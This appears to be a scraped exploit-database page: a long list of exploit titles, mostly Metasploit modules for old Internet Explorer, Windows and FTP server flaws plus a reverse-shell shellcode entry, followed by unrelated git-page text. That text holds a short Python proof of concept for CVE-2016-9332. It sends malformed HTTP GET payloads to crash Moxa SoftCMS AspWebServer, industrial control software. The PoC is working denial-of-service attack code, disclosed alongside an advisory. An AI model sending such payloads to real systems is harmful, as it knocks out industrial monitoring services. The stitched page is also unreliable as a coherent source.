Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow (MS06-067) (Metasploit)
Microsoft Visual Studio - Msmask32.ocx ActiveX Buffer Overflow (MS08-070) (Metasploit)

Microsoft Windows Media Encoder 9 - 'wmex.dll' ActiveX Buffer Overflow (Metasploit)
Microsoft Windows Media Encoder 9 - 'wmex.dll' ActiveX Buffer Overflow (MS08-053) (Metasploit)

Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) (MS07-017) (Metasploit)
Microsoft Internet Explorer - XML Core Services HTTP Request Handling (Metasploit)
Microsoft Internet Explorer - CSS Recursive Import Use-After-Free (Metasploit)
Microsoft Internet Explorer - XML Core Services HTTP Request Handling (MS06-071) (Metasploit)
Microsoft Internet Explorer - CSS Recursive Import Use-After-Free (MS11-003) (Metasploit)

Microsoft Office Web Components (OWC) Spreadsheet - msDataSourceObject Memory Corruption (Metasploit)
Microsoft Office Web Components (OWC) Spreadsheet - msDataSourceObject Memory Corruption (MS09-043) (Metasploit)
Microsoft Internet Explorer - Winhlp32.exe MsgBox Code Execution (Metasploit)
Microsoft OWC Spreadsheet - HTMLURL Buffer Overflow (Metasploit)
Microsoft Internet Explorer - Winhlp32.exe MsgBox Code Execution (MS10-023) (Metasploit)
Microsoft OWC Spreadsheet - HTMLURL Buffer Overflow (MS09-043) (Metasploit)
Microsoft Help Center - Cross-Site Scripting / Command Execution (Metasploit)
Microsoft Internet Explorer - Style getElementsByTagName Memory Corruption (Metasploit)
Microsoft Help Center - Cross-Site Scripting / Command Execution (MS10-042) (Metasploit)
Microsoft Internet Explorer - Style getElementsByTagName Memory Corruption (MS09-072) (Metasploit)

Microsoft Internet Explorer - CSS SetUserClip Memory Corruption (Metasploit)
Microsoft Internet Explorer - CSS SetUserClip Memory Corruption (MS10-090) (Metasploit)

Microsoft Internet Explorer 7 - CFunctionPointer Uninitialized Memory Corruption (Metasploit)
Microsoft Internet Explorer 7 - CFunctionPointer Uninitialized Memory Corruption (MS09-002) (Metasploit)

Microsoft Internet Explorer - COM CreateObject Code Execution (Metasploit)
Microsoft Internet Explorer - COM CreateObject Code Execution (MS06-014/MS06-073) (Metasploit)

Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (2)
Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (MS06-057) (Metasploit) (2)

Microsoft Internet Explorer - Tabular Data Control ActiveX Memory Corruption (Metasploit)
Microsoft Internet Explorer - Tabular Data Control ActiveX Memory Corruption (MS10-018) (Metasploit)

Microsoft Windows - Shell LNK Code Execution (Metasploit)
Microsoft Windows - Shell LNK Code Execution (MS10-046) (Metasploit)

Microsoft Internet Explorer - createTextRange() Code Execution (Metasploit)
Microsoft Internet Explorer - createTextRange() Code Execution (MS06-013) (Metasploit)

Microsoft Internet Explorer - Object Type (MS03-020)
Microsoft Internet Explorer - Object Type (MS03-020) (Metasploit)

Microsoft Internet Explorer - Data Binding Memory Corruption (Metasploit)
Microsoft Internet Explorer - Data Binding Memory Corruption (MS08-078) (Metasploit)

Microsoft Internet Explorer - DHTML Behaviour Use-After-Free (Metasploit)
Microsoft Internet Explorer - DHTML Behaviour Use-After-Free (MS10-018) (Metasploit)
Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (1)
Microsoft Internet Explorer - (VML) Fill Method Code Execution (Metasploit)
Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit) (1)
Microsoft Internet Explorer - (VML) Fill Method Code Execution (MS06-055) (Metasploit)

Microsoft Internet Explorer - 'Aurora' Memory Corruption (Metasploit)
Microsoft Internet Explorer - 'Aurora' Memory Corruption (MS10-002) (Metasploit)

Microsoft Windows XP/2003/Vista - Metafile Escape() SetAbortProc Code Execution (Metasploit)
Microsoft Windows XP/2003/Vista - Metafile Escape() SetAbortProc Code Execution (MS06-001) (Metasploit)

CCProxy 6.2 - Telnet Proxy Ping Overflow (2) (Metasploit)
CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit) (2)
Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)
Outlook - ATTACH_BY_REF_RESOLVE File Execution (Metasploit)
Outlook - ATTACH_BY_REF_ONLY File Execution (Metasploit)
Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP) (MS07-017) (Metasploit)
Microsoft Outlook - ATTACH_BY_REF_RESOLVE File Execution (MS10-045) (Metasploit)
Microsoft Outlook - ATTACH_BY_REF_ONLY File Execution (MS10-045) (Metasploit)

Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST)
Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST) (Metasploit)

FTPGetter Standard 3.55.0.05 - Stack Buffer Overflow (PWD)
FTPGetter Standard 3.55.0.05 - Stack Buffer Overflow (PWD) (Metasploit)

httpdx - tolog() Function Format String (1)
httpdx - tolog() Function Format String (Metasploit) (1)

Microsoft IIS FTP Server - NLST Response Overflow (Metasploit)
Microsoft IIS FTP Server - NLST Response Overflow (MS09-053) (Metasploit)
Microsoft Message Queueing Service - Path Overflow (Metasploit)
Microsoft DNS RPC Service - extractQuotedChar() Overflow (TCP)
Microsoft RPC DCOM Interface - Overflow Exploit (Metasploit)
Microsoft Message Queueing Service - DNS Name Path Overflow (Metasploit)
Microsoft Message Queueing Service - Path Overflow (MS05-017) (Metasploit)
Microsoft DNS RPC Service - extractQuotedChar() TCP Overflow (MS07-029) (Metasploit)
Microsoft RPC DCOM Interface - Overflow Exploit (MS03-026) (Metasploit)
Microsoft Message Queueing Service - DNS Name Path Overflow (MS07-065) (Metasploit)

IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (2)
IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (Metasploit) (2)

Novell ZENworks Configuration Management 10.2.0 - Remote Execution (1)
Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) (1)

httpdx - tolog() Function Format String (2)
httpdx - tolog() Function Format String (Metasploit) (2)

Exchange 2000 - XEXCH50 Heap Overflow (MS03-046)
Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow (MS03-046) (Metasploit)

NetSupport Manager Agent - Remote Buffer Overflow (2)
NetSupport Manager Agent - Remote Buffer Overflow (Metasploit) (2)

Apple iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (1)
Apple iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (Metasploit) (1)

Apple iPhone MobileSafari LibTIFF - 'email' Buffer Overflow (2)
Apple iPhone MobileSafari LibTIFF - 'email' Buffer Overflow (Metasploit) (2)

SquirrelMail PGP Plugin - Command Execution (SMTP)
SquirrelMail PGP Plugin - Command Execution (SMTP) (Metasploit)

ToolTalk - rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
ToolTalk - rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX) (Metasploit)

Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (2)
Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (Metasploit) (2)

Microsoft Internet Explorer - MSHTML!CObjectElement Use-After-Free (MS11-050)
Microsoft Internet Explorer - MSHTML!CObjectElement Use-After-Free (MS11-050) (Metasploit)

Lotus Notes 8.0.x < 8.5.2 FP2 - Autonomy Keyview (.lzh attachment)
Lotus Notes 8.0.x < 8.5.2 FP2 - Autonomy Keyview ('.lzh' Attachment) (Metasploit)

Mozilla Firefox - 'nsTreeRange' Dangling Pointer (1)
Mozilla Firefox - 'nsTreeRange' Dangling Pointer (Metasploit) (1)

Mozilla Firefox 3.6.16 - mChannel Use-After-Free (1)
Mozilla Firefox 3.6.16 - mChannel Use-After-Free (Metasploit) (1)

Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026)
Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026) (Metasploit)

ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (2)
ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (Metasploit) (2)

Mozilla Firefox - Array.reduceRight() Integer Overflow (2)
Mozilla Firefox - Array.reduceRight() Integer Overflow (Metasploit) (2)

Microsoft Internet Explorer - JavaScript OnLoad Handler Remote Code Execution (Metasploit)
Microsoft Internet Explorer - JavaScript OnLoad Handler Remote Code Execution (MS05-054) (Metasploit)

Mozilla Firefox 3.6.16 - mChannel Use-After-Free (2)
Mozilla Firefox 3.6.16 - mChannel Use-After-Free (Metasploit) (2)

Microsoft Windows - midiOutPlayNextPolyEvent Heap Overflow (MS12-004)
Microsoft Windows - midiOutPlayNextPolyEvent Heap Overflow (MS12-004) (Metasploit)

Sun Java Web Start Plugin - Command Line Argument Injection (2012)
Sun Java Web Start Plugin - Command Line Argument Injection (2012) (Metasploit)

Microsoft Internet Explorer - Object Memory Use-After-Free (MS10-002)
Microsoft Internet Explorer - Object Memory Use-After-Free (MS10-002) (Metasploit)

Microsoft Windows - MSCOMCTL ActiveX Buffer Overflow (MS12-027)
Microsoft Windows - MSCOMCTL ActiveX Buffer Overflow (MS12-027) (Metasploit)

quickshare file share 1.2.1 - Directory Traversal (2)
quickshare file share 1.2.1 - Directory Traversal (Metasploit) (2)

Microsoft IIS - MDAC 'msadcs.dll' RDS DataStub Content-Type Overflow (Metasploit)
Microsoft IIS - MDAC 'msadcs.dll' RDS DataStub Content-Type Overflow (MS02-065) (Metasploit)

Microsoft Internet Explorer - Same ID Property Deleted Object Handling Memory Corruption (MS12-037)
Microsoft Internet Explorer - Same ID Property Deleted Object Handling Memory Corruption (MS12-037) (Metasploit)
ComSndFTP 1.3.7 Beta - USER Format String (Write4)
Microsoft XML Core Services - MSXML Uninitialized Memory Corruption (Metasploit)
ComSndFTP 1.3.7 Beta - USER Format String (Write4) (Metasploit)
Microsoft XML Core Services - MSXML Uninitialized Memory Corruption (MS12-043) (Metasploit)

Microsoft Internet Explorer 5.0/4.0.1 - JavaScript URL redirection
Microsoft Internet Explorer 5.0/4.0.1 - JavaScript URL Redirection (MS99-043)

Microsoft Office SharePoint Server 2007 - Remote Code Execution (Metasploit)
Microsoft Office SharePoint Server 2007 - Remote Code Execution (MS10-104) (Metasploit)

Microsoft IIS 3.0/4.0 / Microsoft index server 2.0 - Directory Traversal
Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 - Directory Traversal (MS00-006)

Microsoft Internet Explorer - Fixed Table Col Span Heap Overflow (Metasploit)
Microsoft Internet Explorer - Fixed Table Col Span Heap Overflow (MS12-037) (Metasploit)

Microsoft Internet Explorer 5.5 - Index.dat
Microsoft Internet Explorer 5.5 - 'Index.dat' Exploit (MS00-055)

Microsoft Visual Studio RAD Support - Buffer Overflow (Metasploit)
Microsoft Visual Studio RAD Support - Buffer Overflow (MS03-051) (Metasploit)

JBoss - DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)
JBoss - DeploymentFileRepository WAR Deployment (via JMXInvokerServlet) (Metasploit)

Microsoft Internet Explorer 5 - Zone Spoofing
Microsoft Internet Explorer 5 - Zone Spoofing (MS01-055)

HP SiteScope - Remote Code Execution (1)
HP SiteScope - Remote Code Execution (Metasploit) (1)

Microsoft Internet Explorer 5 - Cascading Style Sheet File Disclosure
Microsoft Internet Explorer 5 - Cascading Style Sheet File Disclosure (MS02-023)

Metasploit Web UI - Diagnostic Console Command Execution
Metasploit Web UI - Diagnostic Console Command Execution (Metasploit)

Microsoft IIS 4.0/5.0 - SMTP Service Encapsulated SMTP Address
Microsoft IIS 4.0/5.0 - SMTP Service Encapsulated SMTP Address (MS99-027)

Microsoft Internet Explorer 5 - Dialog Same Origin Policy Bypass Variant
Microsoft Internet Explorer 5 - Dialog Same Origin Policy Bypass Variant (MS02-047)

Microsoft Internet Explorer - execCommand Use-After-Free (MS12-063)
Microsoft Internet Explorer - execCommand Use-After-Free (MS12-063) (Metasploit)

Microsoft Internet Explorer 5 - XML Page Object Type Validation
Microsoft Internet Explorer 5 - XML Page Object Type Validation (MS03-040)

Microsoft Windows XP/2000 - Messenger Service Buffer Overrun
Microsoft Windows XP/2000 - Messenger Service Buffer Overrun (MS03-043)

Microsoft Internet Explorer 5.0.1 - ITS Protocol Zone Bypass
Microsoft Internet Explorer 5.0.1 - ITS Protocol Zone Bypass (MS04-013)

Microsoft Internet Explorer 5 - NavigateAndFind() Cross-Zone Policy
Microsoft Internet Explorer 5 - NavigateAndFind() Cross-Zone Policy (MS04-004)

Microsoft Internet Explorer - Option Element Use-After-Free (Metasploit)
Microsoft Internet Explorer - Option Element Use-After-Free (MS11-081) (Metasploit)

Java Applet JMX - Remote Code Execution (1)
Java Applet JMX - Remote Code Execution (Metasploit) (1)

myServer 0.6.2 - math_sum.mscgi Multiple Parameter Cross-Site Scripting
MyServer 0.6.2 - math_sum.mscgi Multiple Parameter Cross-Site Scripting

VMware OVF Tools - Format String (1)
VMware OVF Tools - Format String (Metasploit) (1)

VMware OVF Tools - Format String (2)
VMware OVF Tools - Format String (Metasploit) (2)
Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009)
Java Applet JMX - Remote Code Execution (2)
Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit)
Java Applet JMX - Remote Code Execution (Metasploit) (2)

Microsoft Internet Explorer 5.x - Valid File Drag and Drop Embedded Code
Microsoft Internet Explorer 5.x - Valid File Drag and Drop Embedded Code (MS04-038)

Novell ZENworks Configuration Management 10.2.0 - Remote Execution (2)
Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) (2)

phpMyAdmin - Authenticated Remote Code Execution via preg_replace()
phpMyAdmin - 'preg_replace' Authenticated Remote Code Execution (Metasploit)

Microsoft Internet Explorer 5.0.1 - Content Advisor File Handling Buffer Overflow
Microsoft Internet Explorer 5.0.1 - Content Advisor File Handling Buffer Overflow (MS05-020)

Microsoft Internet Explorer - textNode Use-After-Free (Metasploit)
Microsoft Internet Explorer - textNode Use-After-Free (MS13-037) (Metasploit)

Microsoft Internet Explorer - COALineDashStyleArray Integer Overflow (MS13-009)
Microsoft Internet Explorer - COALineDashStyleArray Integer Overflow (MS13-009) (Metasploit)

D-Link Devices - Unauthenticated Remote Command Execution (2)
D-Link Devices - Unauthenticated Remote Command Execution (Metasploit) (2)

D-Link Devices - Unauthenticated Remote Command Execution (1)
D-Link Devices - Unauthenticated Remote Command Execution (Metasploit) (1)

Microsoft Internet Explorer - CFlatMarkupPointer Use-After-Free (MS13-059)
Microsoft Internet Explorer - CFlatMarkupPointer Use-After-Free (MS13-059) (Metasploit)
Microsoft Internet Explorer - CAnchorElement Use-After-Free (MS13-055)
HP SiteScope - Remote Code Execution (2)
Microsoft Internet Explorer - CAnchorElement Use-After-Free (MS13-055) (Metasploit)
HP SiteScope - Remote Code Execution (Metasploit) (2)
CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (2)
Microsoft Internet Explorer - CCaret Use-After-Free (MS13-069)
Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071)
CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit) (2)
Microsoft Internet Explorer - CCaret Use-After-Free (MS13-069) (Metasploit)
Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071) (Metasploit)

Microsoft Internet Explorer - CDisplayPointer Use-After-Free (MS13-080)
Microsoft Internet Explorer - CDisplayPointer Use-After-Free (MS13-080) (Metasploit)
Microsoft Internet Explorer - CardSpaceClaimCollection ActiveX Integer Underflow (MS13-090)
Microsoft Internet Explorer - COALineDashStyleArray Unsafe Memory Access (MS12-022)
Microsoft Internet Explorer - CardSpaceClaimCollection ActiveX Integer Underflow (MS13-090) (Metasploit)
Microsoft Internet Explorer - COALineDashStyleArray Unsafe Memory Access (MS12-022) (Metasploit)

Microsoft Internet Explorer - TextRange Use-After-Free (MS14-012)
Microsoft Internet Explorer - TextRange Use-After-Free (MS14-012) (Metasploit)

Microsoft Internet Explorer - CMarkup Use-After-Free (MS14-012)
Microsoft Internet Explorer - CMarkup Use-After-Free (MS14-012) (Metasploit)

Microsoft Windows Media Center - MCL Exploit (MS15-100)
Microsoft Windows Media Center - MCL Exploit (MS15-100) (Metasploit)

Advantech Switch - Bash Environment Variable Code Injection (Shellshock)
Advantech Switch - Bash Environment Variable Code Injection (Shellshock) (Metasploit)

Oracle BeeHive 2 - voice-servlet processEvaluation()
Oracle BeeHive 2 - voice-servlet processEvaluation() (Metasploit)

Microsoft Windows Media Center - '.Link' File Incorrectly Resolved Reference
Microsoft Windows Media Center - '.Link' File Incorrectly Resolved Reference (MS15-134)

IPFire - Bash Environment Variable Injection (Shellshock)
IPFire - Bash Environment Variable Injection (Shellshock) (Metasploit)

Ruby on Rails - Dynamic Render File Upload / Remote Code Execution
Ruby on Rails - Dynamic Render File Upload / Remote Code Execution (Metasploit)

FTPShell Client 5.24 - 'PWD' Remote Buffer Overflow

Windows x64 - Reverse Shell TCP Shellcode (694 bytes)

phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (2)
phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (Metasploit) (2)

PmWiki 2.2.34 - (pagelist) Remote PHP Code Injection (2)
PmWiki 2.2.34 - (pagelist) Remote PHP Code Injection (2) (Metasploit)
Wordpress Plugin BBS e-Franchise 1.1.1 - SQL Injection
Wordpress Plugin Product Catalog 8 1.2.0 - SQL Injection
EditMe CMS - Cross-Site Request Forgery (Add New Admin)
2016-11-19 05:01:21 +00:00

33 lines
1.3 KiB
Python
Executable file
Raw Blame History

'''
# Title: Moxa SoftCMS 1.5 AspWebServer Denial of Service Vulnerability
# Author: Zhou Yu
# Email: 504137480@qq.com
# Vendor: http://www.moxa.com/
# Versions affected: 1.5 or prior versions
# Test on: Moxa SoftCMS 1.5 on Windows 7 SP1 x32
# CVE: CVE-2016-9332
# Advisory: https://ics-cert.us-cert.gov/advisories/ICSA-16-322-02
Vulnerability Description:
AspWebServer does not properly validate input. An attacker could provide unexpected values and cause the program to crash or excessive consumption of resources could result in a denial-of-service condition.
Vulnerability Discovery Method:
With the help of kitty fuzzing framework, we are able to find some vulnerabilities of the AspWebServer when parsing HTTP GET request. Details of the fuzzer scripts and output can be found here: https://github.com/dazhouzhou/ICS-Vulnerabilities/tree/master/Moxa/SoftCMS .
'''
import socket
host = '192.168.124.128'
port = 81
# extracted four payloads from crashes that can crash the AspWebServer.exe
payload1 = 'GET /\ HTTP/1.1\r\n\r\n'
payload2 = 'GET \x00 HTTP/1.1\r\n\r\n'
payload3 = 'GET \n HTTP/1.1\r\n\r\n'
payload4 = 'GET /. HTTP/1.1\r\n\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(payload1)
s.close()
Reference in a new issue View git blame Copy permalink